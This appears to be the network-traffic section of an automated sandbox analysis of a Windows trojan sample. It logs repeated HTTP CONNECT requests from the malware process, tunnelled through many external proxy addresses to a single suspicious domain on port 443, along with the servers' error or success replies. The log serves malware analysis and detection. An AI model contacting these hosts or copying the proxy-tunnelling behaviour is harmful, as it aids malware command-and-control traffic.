                                                                                Feb 23, 2024 14:28:30.372476101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1100192.168.2.8533168.213.129.1580605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.388993979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.690949917 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1101192.168.2.8533178.213.137.15588885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.400141001 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:32.712311029 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1102192.168.2.853315103.118.46.17480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.429761887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1103192.168.2.853399104.17.50.45805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.461728096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.549343109 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1104192.168.2.85334747.242.15.120156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.480834961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1105192.168.2.85334247.243.205.131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.481770992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1106192.168.2.85334442.98.10.34805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.488106966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.803858995 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:27:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1107192.168.2.853340171.248.219.10810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.498886108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1108192.168.2.852435161.97.163.52349165828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.525365114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.615677118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.693424940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.695167065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1109192.168.2.85282381.70.253.15280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.525803089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1110192.168.2.853414172.67.182.107805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.534403086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.621341944 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1111192.168.2.850521117.54.114.35805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.585134983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1112192.168.2.853380200.41.148.2120005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.645797968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1113192.168.2.850177103.69.87.14231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.645944118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679408073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.695164919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.789071083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.113698959 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1114192.168.2.85338345.138.87.23810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.645945072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1115192.168.2.85261123.92.223.12231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.662798882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1116192.168.2.85337158.234.116.19781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.662798882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1117192.168.2.85338245.11.95.16560495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.670679092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1118192.168.2.850853107.180.101.18333025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.670885086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679430962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1119192.168.2.85339079.110.196.14580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.670926094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1120192.168.2.85336342.200.196.20880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.672563076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1121192.168.2.8534425.161.98.20432405828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.672821999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991801023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382693052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.194976091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1122192.168.2.85339644.226.167.10231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.685017109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1123192.168.2.850806212.110.188.189344055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.685101032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.788775921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.882608891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992188931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.991708040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1124192.168.2.850855165.227.0.192805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.714757919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.785711050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820635080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898319006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.991672039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.234289885 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:59 GMT
                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                Feb 23, 2024 14:28:59.234328985 CET294INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyou


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1125192.168.2.853449104.23.141.196805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.714833975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.804297924 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1126192.168.2.850827143.110.232.177805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.717228889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.785718918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820574999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898303986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1127192.168.2.850755162.240.19.133426905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.720211029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.788896084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.882611036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992198944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1128192.168.2.853460172.67.181.136805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.720340014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.807569981 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1129192.168.2.85291168.71.249.153486065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.720340967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
